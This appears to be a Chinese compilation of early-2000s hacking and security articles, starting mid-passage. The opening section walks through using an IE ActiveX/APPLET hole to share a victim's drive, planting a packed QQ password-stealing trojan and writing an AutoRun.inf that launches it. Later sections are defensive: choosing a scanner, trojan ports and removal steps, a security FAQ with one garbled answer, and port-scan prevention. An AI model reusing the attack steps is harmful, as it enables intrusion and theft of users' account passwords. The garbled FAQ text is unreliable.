没有打补丁(网上这样的电脑有很多),就可以把他的 C 盘共享出来。整个方法 的原理就是把 com.ms.activeX.ActiveXComponent 对象嵌入<APPLET>标记中,这样会导致 任意创建和解释执行 ActiveX 对象,使我们可以创建任意文件、运行程序、写注册表。未打 补丁的 IE,在打开含有上述代码的网页时不会有任何警告,我们就是利用这个漏洞把对方 的硬盘被共享出来。 等对方中招后,就把对方的硬盘映射过来,可以使用 net use 命令,也可以使用网络刺客 II 114 等软件。下一步可以给对方植入一个盗 QQ 的软件,比方说 QQ 杀手等,注意一定要用 ASPack 或其他加壳软件给木马加壳(其实就是另类“压缩”),防止杀毒软件发现。 最后,打开记事本键入以下内容: [AutoRun] open=winnt32.exe 保存为 AutoRun.inf,其中的 winnt32.exe 为木马文件。把 AutoRun.inf 和 winnt32.exe 一起拷 到对方某分区的根目录下。这样,只要他双击该分区就会中木马!这样可以大大的增加木马 运行的主动性!须知许多人现在都非常警惕,不熟悉的文件他们轻易的不会运行,而这种方 法就很难防范了。 以后,你就等着用邮箱收信收对方的 QQ 密码吧。 注意,本文只是技术交流,大家不要随意盗取别人的 QQ。同时为了保障安全我们没有完全 刊登源代码。敬请原谅! =================================== 选择漏洞扫描工具 对于一个复杂的多层结构的系统和网络安全规划来说,隐患扫描是一项重要的组成元素。隐 患扫描能够模拟黑客的行为,对系统设置进行攻击测试,以帮助管理员在黑客攻击之前,找 出网络中存在的 漏洞。这样的工具可以远程评估你的网络的安全级别,并生成评估报告, 提供相应的整改措施。 目前,市场上有很多隐患扫描工具,按照不同的技术(基于网络的、基于主机的、基于代理 的、C/S 的)、不同的特征、不同的报告方法,以及不同的监听模式,可以分成好几类。不 同的产品之间,漏洞检测的准确性差别较大,这就决定了生成的报告的有效性上也有很大区 别。 选择正确的隐患扫描工具,对于提高你的系统的安全性,非常重要。 1、漏洞扫描概述 在字典中,Vulnerability 意思是漏洞或者缺乏足够的防护。在军事术语中,这个词的意思更 为明确,也更为严重------有受攻击的嫌疑。 每个系统都有漏洞,不论你在系统安全性上投入多少财力,攻击者仍然可以发现一些可利用 的特征和配置缺陷。这对于安全管理员来说,实在是个不利的消息。但是,多数的攻击者, 通常做的是简单的事情。发现一个已知的漏洞,远比发现一个未知漏洞要容易的多,这就意 味着:多数攻击者所利用的都是常见的漏洞,这些漏洞,均有书面资料记载。 ⑤ 生成的报告的特性(内容是否全面、是否可配置、是否可定制、报告的格式、输出方式 115 等 ); ⑥ 对于漏洞修复行为的分析和建议(是否只报告存在哪些问题、是否会告诉您应该如何修 补这些漏洞); ⑦ 安全性(由于有些扫描工具不仅仅只是发现漏洞,而且还进一步自动利用这些漏洞,扫 描工具自身是否会带来安全风险); ⑧ 性能; ⑨ 价格结构 这样的话,采用适当的工具,就能在黑客利用这些常见漏洞之前,查出网络的薄弱之处。如 何快速简便地发现这些漏洞,这个非常重要。 漏洞,大体上分为两大类: ① 软件编写错误造成的漏洞; ② 软件配置不当造成的漏洞。 漏洞扫描工具均能检测以上两种类型的漏洞。漏洞扫描工具已经出现好多年了,安全管理员 在使用这些工具的同时,黑客们也在利用这些工具来发现各种类型的系统和网络的漏洞。 入侵是重要的第一步。当您迈出了这一步后,接下来的是:如何选择满足您公司需要的合适 的隐患扫描技术,这同样也很重要。以下列出了一系列衡量因素: ① 底层技术(比如,是被动扫描还是主动扫描,是基于主机扫描还是基于网络扫描); ② 特性; ③ 漏洞库中的漏洞数量; ④ 易用性; 2.1 底层技术 比较漏洞扫描工具,第一是比较其底层技术。你需要的是主动扫描,还是被动扫描;是基于 主机的扫描,还是基于网络的扫描,等等。一些扫描工具是基于 Internet 的,用来管理和集 合的服务器程序,是运行在软件供应商的服务器上,而不是在客户自己的机器上。这种方式 的优点在于检测方式能够保证经常更新,缺点在于需要依赖软件供应商的服务器来完成扫描 工作。 扫描古城可以分为"被动"和"主动"两大类。被动扫描不会产生网络流量包,不会导致目标系 统崩溃,被动扫描工具对正常的网络流量进行分析,可以设计成"永远在线"检测的方式。与 主动扫描工具相比,被动扫描工具的工作方式,与网络监控器或 IDS 类似。 主动扫描工具更多地带有"入侵"的意图,可能会影响网络和目标系统的正常操作。他们并不 是持续不断运行的,通常是隔一段时间检测一次。 116 基于主机的扫描工具需要在每台主机上安装代理(Agent)软件;而基于网络的扫描工具则 不需要。基于网络的扫描工具因为要占用较多资源,一般需要一台专门的计算机。 如果网络环境中含有多种操作系统,您还需要看看扫描其是否兼容这些不同的操作系统(比 如 Microsoft、Unix 以及 Netware 等 )。 2.2 管理员所关心的一些特性 通常,漏洞扫描工具完成一下功能:扫描、生成报告、分析并提出建议,以及数据管理。在 许多方面,扫描是最常见的功能,但是信息管理和扫描结果分析的准确性同样很重要。另外 要考虑的一个方面是通知方式:当发现漏洞后,扫描工具是否会向管理员报警?采用什么方 式报警? 对于漏洞扫描软件来说,管理员通常关系以下几个方面: ① 报表性能好; ② 易安装,易使用; ③ 能够检测出缺少哪些补丁; ④ 扫描性能好,具备快速修复漏洞的能力; ⑤ 对漏洞及漏洞等级检测的可*性; ⑥ 可扩展性; ⑦ 易升级性; ⑧ 性价比好; 2.3 漏洞库 只有漏洞库中存在相关信息,扫描工具才能检测到漏洞,因此,漏洞库的数量决定了扫描工 具能够检测的范围。 然而,数量并不意味着一切,真正的检验标准在于扫描工具能否检测出最常见的漏洞?最根 本的在于,扫描工具能否检测出影响您的系统的那些漏洞?扫描工具中有用的总量取决于你 的网络设备和系统的类型。你使用扫描工具的目的是利用它来检测您的特定环境中的漏洞。 如果你有很多 Netware 服务器,那么,不含 Netware 漏洞库的扫描工具就不是你的最佳选择。 当然,漏洞库中的攻击特性必须经常升级,这样才能检测到最近发现的安全漏洞。 2.4 易使用性 一个难以理解和使用的界面,会阻碍管理员使用这些工具,因此,界面友好性尤为重要。不 同的扫描工具软件,界面也各式各样,从简单的基于文本的,到复杂的图形界面,以及 Web 界面。 2.5 扫描报告 117 对管理员来说,扫描报告的功能越来越重要,在一个面向文档的商务环境中,你不但要能够 完成你的工作,而且还需要提供书面资料说明你是怎样完成的。事实上,一个扫描可能会得 到几百甚至几千个结果,但是这些数据是没用的,除非经过整理,转换成可以为人们理解的 信息。这就意味着理想情况下,扫描工具应该能够对这些数据进行分类和交*引用,可以导 到其他程序中,或者转换成其他格式(比如 CSV,HTML,XML,MHT,MDB,EXCEL 以及 Lotus 等等),采用不同方式来展现它,并且能够很容易的与以前的扫描结果做比较。 漏洞,才完成一半工作。一个完整的方案,同时将告诉你针对这些漏洞将采取哪些措施。一 个好的漏洞扫描工具会对扫描结果进行分析,并提供修复建议。一些扫描工具将这些修复建 议整合在报告中,另外一些则提供产品网站或其它在线资源的链接。 漏洞修复工具,它可以和流行的扫描工具结合在一起使用,对扫描结果进行汇总,并自动完 成修复过程。 2.7 分析的准确性 只有当报告的结果是精确的,提供的修复建议是有效的,一份包含了详细漏洞修复建议的报 告, 才算是一份优秀的报告。一个好的扫描工具必须具有很低的误报率(报告出的漏洞实 际上不存在)和漏报率(漏洞存在,但是没有检测到)。 2.8 安全问题 因扫描工具而造成的网络瘫痪所引起的经济损失,和真实攻击造成的损失是一样的,都非常 巨大。一些扫描工具在发现漏洞后,会尝试进一步利用这些漏洞,这样能够确保这些漏洞是 真实存在的,进而消除误报的可能性。但是,这种方式容易出现难以预料的情况。在使用具 备这种功能的扫描工具的时候,需要格外小心,最好不要将其设置成自动运行状态。 扫描工具可能造成网络失效的另一种原因,是扫描过程中,超负荷的数据包流量造成拒绝服 务(DOS,Denial Of Service)。为了防止这一点,需要选择好适当的扫描设置。相关的设置 项有:并发的线程数、数据包间隔时间、扫描对象总数等,这些项应该能够调整,以便使网 络的影响降到最低。一些扫描工具还提供了"安全扫描"的模板,以防止造成对目标系统的损 耗。 2.9 性能 扫描工具运行的时候,将占用大量的网络带宽,因此,扫描过程应尽快完成。当然,漏洞库 中的漏洞数越多,选择的扫描模式越复杂,扫描所耗时间就越长,因此,这只是个相对的数 值。提高性能的一种方式,是在企业网中部署多个扫描工具,将扫描结果反馈到一个系统中, 对扫描结果进行汇总。 3、隐患扫描工具的价格策略 商业化的扫描工具通常按以下几种方式来发布器授权许可证:按 IP 地址授权,按服务器授 权,按管理员授权。不同的授权许可证方式有所区别。 118 3.1 按 IP 段授权 许多扫描其产品,比如 eEye 的 Retina 和 ISS(Internet Security Scanner)要求企业用户按照 IP 段或 IP 范围来收费。换句话说,价格取决于所授权的可扫描的 IP 地址的数目。 3.2 按服务器授权 一些扫描工具供应商,按照每个服务器/每个工作站来计算器许可证的价格。服务器的授权 价格会比工作站高很多,如果有多台服务器的话,扫描工具的价格会明显上升。 3.3 按管理员授权 对于大多数企业而言,这种授权方式,比较简单,性价比也较好。 4、总结 在现在的互联网环境中,威胁无处不在。为了防范攻击,第一件事就是在黑客发动攻击之前, 发现网络和系统中的漏洞,并及时修复。 但是,漏洞扫描工具在特性、精确性、价格以及可用性上差别较大,如何选择一个正确的隐 患扫描工具,尤为重要。 ===================================================== 黑客及木马攻击常见端口的关闭 以下列出的端口仅为相关木马程序默认情况下开放的端口,请根据具体情况采取相应的操 作: 707 端口的关闭: 这个端口开放表示你可能感染了 nachi 蠕虫病毒,该蠕虫的清除方法如下: 1、停止服务名为 WinS Client 和 Network Connections Sharing 的两项服务 2、删除 c:WinntSYSTEM32WinS 目录下的 DLLHOST.EXE 和 SVCHOST.EXE 文件 3、编辑注册表,删除 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices 项中名 为 RpcTftpd 和 RpcPatch 的两个键值 1999 端口的关闭: 119 这个端口是木马程序 BackDoor 的默认服务端口,该木马清除方法如下: 1、使用进程管理工具将 notpa.exe 进程结束 2、删除 c:Windows 目录下的 notpa.exe 程序 3、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run 项中包含 c:Windows otpa.exe /o=yes 的键值 2001 端口的关闭: 这个端口是木马程序黑洞 2001 的默认服务端口,该木马清除方法如下: 1、首先使用进程管理软件将进程 Windows.exe 杀掉 2、删除 c:Winntsystem32 目录下的 Windows.exe 和 S_Server.exe 文件 3、编辑注册表,删除 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion RunServices 项中名为 Windows 的键值 4、将 HKEY_CLASSES_ROOT 和 HKEY_LOCAL_MACHINESoftwareCLASSES 项中的 Winvxd 项删除 5、修改 HKEY_CLASSES_ROOT xtfileshellopencommand 项中的 c:Winntsystem32S_SERVER.EXE %1 为 C:WinNTNOTEPAD.EXE %1 6、修改 HKEY_LOCAL_MACHINESoftwareCLASSES xtfileshellopencommand 项中的 c:Winntsystem32S_SERVER.EXE %1 键值改为 C:WinNTNOTEPAD.EXE %1 2023 端口的关闭: 这个端口是木马程序 Ripper 的默认服务端口,该木马清除方法如下: 1、使用进程管理工具结束 sysrunt.exe 进程 2、删除 c:Windows 目录下的 sysrunt.exe 程序文件 3、编辑 system.ini 文件,将 shell=explorer.exe sysrunt.exe 改为 shell=explorer.exe 后保存 4、重新启动系统 120 2583 端口的关闭: 这个端口是木马程序 Wincrash v2 的默认服务端口,该木马清除方法如下: 1、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run 项中的 WinManager = "c:Windowsserver.exe"键值 2、编辑 Win.ini 文件,将 run=c:Windowsserver.exe 改为 run=后保存退出 3、重新启动系统后删除 C:Windowssystem SERVER.EXE 3389 端口的关闭: 首先说明 3389 端口是 Windows 的远程管理终端所开的端口,它并不是一个木马程序,请先 确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。 Win2000 关闭的方法: 1、Win2000server 开始-->程序-->管理工具-->服务里找到 Terminal Services 服务项,选中属 性选项将启动类型改成手动,并停止该服务。 2、Win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到 Terminal Services 服务项, 选中属性选项将启动类型改成手动,并停止该服务。 Winxp 关闭的方法: 在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。 4444 端口的关闭: 如果发现你的机器开放这个端口,可能表示你感染了 msblast 蠕虫,清除该蠕虫的方法如下: 1、使用进程管理工具结束 msblast.exe 的进程 2、编辑注册表,删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun 项中的"Windows auto update"="msblast.exe"键值 3、删除 c:Winntsystem32 目录下的 msblast.exe 文件 4899 端口的关闭: 121 首先说明 4899 端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能 算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该 服务是否是你自己开放并且是必需的。如果不是请关闭它。 关闭 4899 端口: 1、请在开始-->运行中输入 cmd(98 以下为 command),然后 cd C:Winntsystem32(你的系统安 装目录),输入 r_server.exe /stop 后按回车。 然后在输入 r_server /uninstall /silence 2、到 C:Winntsystem32(系统目录)下删除 r_server.exe admdll.dll raddrv.dll 三个文件 5800,5900 端口: 首先说明 5800,5900 端口是远程控制软件 VNC 的默认服务端口,但是 VNC 在修改过后会 被用在某些蠕虫中。 请先确认 VNC 是否是你自己开放并且是必须的,如果不是请关闭 关闭的方法: 1、首先使用 fport 命令确定出监听在 5800 和 5900 端口的程序所在位置(通常会是 c:Winntfont***plorer.exe) 2、在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可 以重新运行 c:Winntexplorer.exe) 3、删除 C:Winntfonts 中的 explorer.exe 程序。 4、删除注册表 HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRun 项中的 Explorer 键值。 5、重新启动机器。 6129 端口的关闭: 首先说明 6129 端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是 一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服 务是否是你自己安装并且是必需的,如果不是请关闭 122 关闭 6129 端口: 1、选择开始-->设置-->控制面板-->管理工具-->服务 找到 DameWare Mini Remote Control 项点击右键选择属性选项,将启动类型改成禁用后停止 该服务。 2、到 c:Winntsystem32(系统目录)下将 DWRCS.EXE 程序删除。 3、到注册表内将 HKEY_LOCAL_MACHINESYSTEMControlSet001Services 项中的 DWRCS 键值删除 6267 端口的关闭: 6267 端口是木马程序广外女生的默认服务端口,该木马删除方法如下: 1、启动到安全模式下,删除 c:Winntsystem32 下的 DIAGFG.EXE 文件 2、到 c:Winnt 目录下找到 regedit.exe 文件,将该文件的后缀名改为.com 3、选择开始-->运行输入 regedit.com 进入注册表编辑页面 4、修改 HKEY_CLASSES_ROOTexefileshellopencommand 项的键值为 "%1" %* 5、删 除 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices 项中名字为 Diagnostic Configuration 的键值 6、将 c:Winnt 下的 regedit.com 改回到 regedit.exe 6670、6771 端口的关闭: 这些端口是木马程序 DeepThroat v1.0 - 3.1 默认的服务端口,清除该木马的方法如下: 1 、编辑注册表,删除 HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersion Run 项中的‘System32‘=c:Windowssystem32.exe 键值(版本 1.0)或‘SystemTray‘ = ‘Systray.exe‘ 键值(版本 2.0-3.0)键值 3、重新启动机器后删除 c:Windowssystem32.exe(版本 1.0)或 c:Windowssystemsystray.exe (版本 2.0-3.0) 6939 端口的关闭: 123 这个端口是木马程序 Indoctrination 默认的服务端口,清除该木马的方法如下: 1、编辑注册表,删除 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunOnce HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServicesOnce 四项中所有包含 Msgsrv16 ="msgserv16.exe"的键值 2、重新启动机器后删除 C:Windowssystem 目录下的 msgserv16.exe 文件 6969 端口的关闭: 这个端口是木马程序 PRIORITY 的默认服务端口,清除该木马的方法如下: 1、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run Services 项中的"PServer"= C:WindowsSystemPServer.exe 键值 2、重新启动系统后删除 C:WindowsSystem 目录下的 PServer.exe 文件 7306 端口的关闭: 这个端口是木马程序网络精灵的默认服务端口,该木马删除方法如下: 1、你可以使用 fport 察看 7306 端口由哪个程序监听,记下程序名称和所在的路径 2、如果程序名为 Netspy.exe,你可以在命令行方式下到该程序所在目录输入命令 Netspy.exe /remove 来删除木马 3、如果是其他名字的程序,请先在进程中结束该程序的进程,然后到相应目录下删除该程 序。 4 、编辑注册表,将 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRun 项和 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices 项中与该程序有关的键值删除 7511 端口的关闭: 7511 是木马程序聪明基因的默认连接端口,该木马删除方法如下: 124 1、首先使用进程管理工具杀掉 MBBManager.exe 这个进程 2、删除 c:Winnt(系统安装目录)中的 MBBManager.exe 和 Explore32.exe 程序文件,删除 c:Winntsystem32 目录下的 editor.exe 文件 3 、编辑注册表,删除注册表 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run 项中内容为 C:WinNTMBBManager.exe 键名为 MainBroad BackManager 的项。 4 、修改注册表 HKEY_CLASSES_ROOT xtfileshellopencommand 中的 c:Winntsystem32editor.exe %1 改为 c:WinntNOTEPAD.EXE %1 5、修改注册表 HKEY_LOCAL_MACHINESoftwareCLASSEShlpfileshellopencommand 项中的 C:WinNTexplore32.exe %1 键值改为 C:WinNTWinHLP32.EXE %1 7626 端口的关闭: 7626 是木马冰河的默认开放端口(这个端口可以改变),木马删除方法如下: 1 、启动机器到安全模式下,编辑注册表,删除 HKEY_LOCAL_MACHINEsoftwaremicrosoftWindows CurrentVersionRun 项中内容为 c:Winntsystem32Kernel32.exe 的键值 2、删除 HKEY_LOCAL_MACHINEsoftwaremicrosoftWindows CurrentVersionRunservices 项 中内容为 C:Windowssystem32Kernel32.exe 的键值 3 、修改 HKEY_CLASSES_ROOT xtfileshellopencommand 项下的 C:Winntsystem32Sy***plr.exe %1 为 C:Winnt otepad.exe %1 4、到 C:Windowssystem32 下删除文件 Kernel32.exe 和 Sy***plr.exe 8011 端口的关闭: 8011 端口是木马程序 WAY2.4 的默认服务端口,该木马删除方法如下: 1、首先使用进程管理工具杀掉 msgsvc.exe 的进程 2、到 C:Windowssystem 目录下删除 msgsvc.exe 文件 3、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion 125 Run 项中内容为 C:WinDOWSSYSTEMmsgsvc.exe 的键值 【 全部完 】 黑客新手基础知识 16 问答 问:什么是网络安全? 答:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意 的原因而遭到破坏、更改、泄露,系统可以连续可*正常地运行,网络服务不被中断。 问:什么是计算机病毒? 答:计算机病毒(Computer Virus)是指编制者在计算机程序中插入的破坏计算机功能或者 破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 问:什么是木马? 答:木马是一种带有恶意性质的远程控制软件。木马一般分为客户端(client)和服务器端 (server)。客户端就是本地使用的各种命令的控制台,服务器端则是要给别人运行,只有运 行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件。 问:什么是防火墙?它是如何确保网络安全的? 答:使用防火墙(Firewall)是一种确保网络安全的方法。防火墙是指设置在不同网络(如 可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同 网络或网络安全域之间信息的惟一出入口,能根据企业的安全政策控制(允许、拒绝、监测) 出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信 息安全的基础设施。 问:什么是后门?为什么会存在后门? 答:后门(Back Door)是指一种绕过安全性控制而获取对程序或系统访问权的方āT谌砑 目⒔锥危绦蛟背;嵩谌砑诖唇ê竺乓员憧梢孕薷某绦蛑械娜毕荨H绻竺疟黄渌酥 溃蚴窃诜⒉既砑懊挥猩境敲此统闪税踩肌? 问:什么叫入侵检测? 答:入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展系统管理员的安全管理能 力(包括安全审计、监视、进攻识别和响应),提高信息安全基础结构的完整性。它从计算 机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的 行为和遭到袭击的迹象 126 问:什么叫数据包监测?它有什么作用? 答:数据包监测可以被认为是一根窃听电话线在计算机网络中的等价物。当某人在“监听” 网络时,他们实际上是在阅读和解释网络上传送的数据包。如果你需要在互联网上通过计算 机发送一封电子邮件或请求下载一个网页,这些操作都会使数据通过你和数据目的地之间的 许多计算机。这些传输信息时经过的计算机都能够看到你发送的数据,而数据包监测工具就 允许某人截获数据并且查看它。 问:什么是 NIDS? 答:NIDS 是 Network Intrusion Detection System 的缩写,即网络入侵检测系统,主要用于检 测 Hacker 或 Cracker 通过网络进行的入侵行为。NIDS 的运行方式有两种,一种是在目标主 机上运行以监测其本身的通信信息,另一种是在一台单独的机器上运行以监测所有网络设备 的通信信息,比如 Hub、路由器。 问:什么叫 SYN 包? 答:TCP 连接的第一个包,非常小的一种数据包。SYN 攻击包括大量此类的包,由于这些 包看上去来自实际不存在的站点,因此无法有效进行处理。 问:加密技术是指什么? 答:加密技术是最常用的安全保密手段,利用技术手段把重要的数据变为乱码(加密)传送, 到达目的地后再用相同或不同的手段还原(解密)。 加密技术包括两个元素:算法和密钥。算法是将普通的信息或者可以理解的信息与一串数字 (密钥)结合,产生不可理解的密文的步骤,密钥是用来对数据进行编码和解密的一种算法。 在安全保密中,可通过适当的钥加密技术和管理机制来保证网络的信息通信安全。 问:什么叫蠕虫病毒? 答:蠕虫病毒(Worm)源自第一种在网络上传播的病毒。1988 年,22 岁的康奈尔大学研究 生罗伯特·莫里斯(Robert Morris)通过网络发送了一种专为攻击 UNIX 系统缺陷、名为“蠕 虫 ”( Worm)的病毒。蠕虫造成了 6000 个系统瘫痪,估计损失为 200 万到 6000 万美元。由 于这只蠕虫的诞生,在网上还专门成立了计算机应急小组(CERT)。现在蠕虫病毒家族已经 壮大到成千上万种,并且这千万种蠕虫病毒大都出自黑客之手。 问:什么是操作系统型病毒?它有什么危害? 答:这种病毒会用它自己的程序加入操作系统或者取代部分操作系统进行工作,具有很强的 破坏力,会导致整个系统瘫痪。而且由于感染了操作系统,这种病毒在运行时,会用自己的 程序片断取代操作系统的合法程序模块。根据病毒自身的特点和被替代的操作系统中合法程 序模块在操作系统中运行的地位与作用,以及病毒取代操作系统的取代方式等,对操作系统 进行破坏。同时,这种病毒对系统中文件的感染性也很强。 127 问:莫里斯蠕虫是指什么?它有什么特点? 答:它的编写者是美国康乃尔大学一年级研究生罗特·莫里斯。这个程序只有 99 行,利用 了 Unix 系统中的缺点,用 Finger 命令查联机用户名单,然后破译用户口令,用 Mail 系统复 制、传播本身的源程序,再编译生成代码。 最初的网络蠕虫设计目的是当网络空闲时,程序就在计算机间“游荡”而不带来任何损害。 当有机器负荷过重时,该程序可以从空闲计算机“借取资源”而达到网络的负载平衡。而莫 里斯蠕虫不是“借取资源”,而是“耗尽所有资源”。 问:什么是 DDoS?它会导致什么后果? 答:DDoS 也就是分布式拒绝服务攻击。它使用与普通的拒绝服务攻击同样的方法,但是发 起攻击的源是多个。通常攻击者使用下载的工具渗透无保护的主机,当获得该主机的适当的 访问权限后,攻击者在主机中安装软件的服务或进程(以下简称代理)。这些代理保持睡眠 状态,直到从它们的主控端得到指令,对指定的目标发起拒绝服务攻击。随着危害力极强的 黑客工具的广泛传播使用,分布式拒绝服务攻击可以同时对一个目标发起几千个攻击。单个 的拒绝服务攻击的威力也许对带宽较宽的站点没有影响,而分布于全球的几千个攻击将会产 生致命的后果。 问:局域网内部的 ARP 攻击是指什么? 答:ARP 协议的基本功能就是通过目标设备的 IP 地址,查询目标设备的 MAC 地址,以保 证通信的进行。 基于 ARP 协议的这一工作特性,黑客向对方计算机不断发送有欺诈性质的 ARP 数据包,数 据包内包含有与当前设备重复的 Mac 地址,使对方在回应报文时,由于简单的地址重复错 误而导致不能进行正常的网络通信。一般情况下,受到 ARP 攻击的计算机会出现两种现象: 1.不断弹出“本机的 XXX 段硬件地址与网络中的 XXX 段地址冲突”的对话框。 2.计算机不能正常上网,出现网络中断的症状。 因为这种攻击是利用 ARP 请求报文进行“欺骗”的,所以防火墙会误以为是正常的请求数 据包,不予拦截。因此普通的防火墙很难抵挡这种攻击。 问:什么叫欺骗攻击?它有哪些攻击方式? 答:网络欺骗的技术主要有:HONEYPOT 和分布式 HONEYPOT、欺骗空间技术等。主要方 式有:IP 欺骗、ARP 欺骗、DNS 欺骗、Web 欺骗、电子邮件欺骗、源路由欺骗(通过指定路 由,以假冒身份与其他主机进行合法通信或发送假报文,使受攻击主机出现错误动作)、地 址欺骗(包括伪造源地址和伪造中间站点)等。 ======================================================== 菜鸟黑客入门攻击及防范技巧 128 在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方 的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基 本的网络信息——对方的 IP 地址;以及用户如何防范自己的 IP 泄漏。 ■ 获取 IP “IP”作为 Net 用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不 同的网络情况采取不同的方法,如:在局域网内使用 Ping 指令,Ping 对方在网络中的名称 而获得 IP;在 Internet 上使用 IP 版的 QQ 直接显示。而最“牛”,也是最有效的办法是截获 并分析对方的网络数据包。如图 1 所示,这是用 Windows 2003 的网络监视器捕获的网络数 据包,可能一般的用户比较难看懂这些 16 进制的代码,而对于了解网络知识的黑客,他们 可以找到并直接通过软件解析截获后的数据包的 IP 包头信息,再根据这些信息了解具体的 IP。 ■ 隐藏 IP 虽然侦察 IP 的方法多样,但用户可以隐藏 IP 的方法同样多样。就拿对付最有效的“数据包 分析方法”而言,就可以安装能够自动去掉发送数据包包头 IP 信 息 的“ Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点,譬如:它耗费资源严重,降低计算 机性能;在访问一些论坛或者网站时会受影响;不适合网吧用户使用等等。现在的个人用户 采用最普及隐藏 IP 的方法应该是使用代理,由于使用代理服务器后,“转址服务”会对发送 出去的数据包有所修改,致使“数据包分析”的方法失效。一些容易泄漏用户 IP 的网络软 件(QQ、MSN、IE 等)都支持使用代理方式连接 Internet,特别是 QQ 使用“ezProxy”等 代理软件连接后,IP 版的 QQ 都无法显示该 IP 地址。这里笔者介绍一款比较适合个人用户 的简易代理软件——网络新手 IP 隐藏器(如图 2),只要在“代理服务器”和“代理服务器 端”填入正确的代理服务器地址和端口,即可对 http 使用代理,比较适合由于 IE 和 QQ 泄 漏 IP 的情况。 不过使用代理服务器,同样有一些缺点,如:会影响网络通讯的速度;需要网络上的一台能 够提供代理能力的计算机,如果用户无法找到这样的代理服务器就不能使用代理(查找代理 服务器时,可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。 虽然代理可以有效地隐藏用户 IP,但高深的黑客亦可以绕过代理,查找到对方的真实 IP 地 址,用户在何种情况下使用何种方法隐藏 IP,也要因情况而论。 黑客的探测方式里除了侦察 IP,还有一项——端口扫描。通过“端口扫描”可以知道被扫 描的计算机哪些服务、端口是打开而没有被使用的(可以理解为寻找通往计算机的通道)。 129 一、端口扫描 网上很容易找到远程端口扫描的工具,如 Superscan、IP Scanner、Fluxay(流光)等(如图 1), 这就是用“流光”对试验主机 192.168.1.8 进行端口扫描后的结果。从中我们可以清楚地了 解,该主机的哪些非常用端口是打开的;是否支持 FTP、Web 服务;且 FTP 服务是否支持 “匿名”,以及 IIS 版本,是否有可以被成功攻破的 IIS 漏洞也显示出来。 二、阻止端口扫描 防范端口扫描的方法有两个: 1. 关闭闲置和有潜在危险的端口 这个方法有些“死板”,它的本质是——将所有用户需要用到的正常计算机端口外的其他端 口都关闭掉。因为就黑客而言,所有的端口都可能成为攻击的目标。换句话说“计算机的所 有对外通讯的端口都存在潜在的危险”,而一些系统必要的通讯端口,如访问网页需要的 HTTP(80 端 口 ); QQ(4000 端口)等不能被关闭。 在 Windows NT 核心系统(Windows 2000/XP/ 2003)中要关闭掉一些闲置端口是比较方便的, 可以采用“定向关闭指定服务的端口”和“只开放允许端口的方式”。计算机的一些网络服 务会有系统分配默认的端口,将一些闲置的服务关闭掉,其对应的端口也会被关闭了(如图 2)。进入“控制面板”、“管理工具”、“服务”项内,关闭掉计算机的一些没有使用的服务(如 FTP 服务、DNS 服务、IIS Admin 服务等等),它们对应的端口也被停用了。至于“只开放 允许端口的方式”,可以利用系统的“TCP/IP 筛选”功能实现,设置的时候,“只允许”系 统的一些基本网络通讯需要的端口即可(关于“TCP/IP 的筛选”,请参看本期应用专题)。 2. 检查各端口,有端口扫描的症状时,立即屏蔽该端口 这种预防端口扫描的方式显然用户自己手工是不可能完成的,或者说完成起来相当困难,需 要借助软件。这些软件就是我们常用的网络防火墙。 防火墙的工作原理是:首先检查每个到达你的电脑的数据包,在这个包被你机上运行的任何 软件看到之前,防火墙有完全的否决权,可以禁止你的电脑接收 Internet 上的任何东西。当 第一个请求建立连接的包被你的电脑回应后,一个“TCP/IP 端口”被打开;端口扫描时, 对方计算机不断和本地计算机建立连接,并逐渐打开各个服务所对应的“TCP/IP 端口”及 闲置端口,防火墙经过自带的拦截规则判断,就能够知道对方是否正进行端口扫描,并拦截 掉对方发送过来的所有扫描需要的数据包。 现在市面上几乎所有网络防火墙都能够抵御端口扫描,在默认安装后,应该检查一些防火墙 所拦截的端口扫描规则是否被选中,否则它会放行端口扫描,而只是在日志中留下信息而已。 130 黑客在进行攻击前的准备工作,就此介绍完毕。在以后的内容中,将转入正式的入侵、窃取 和攻击等具体的介绍。 上网了吧,用 Q 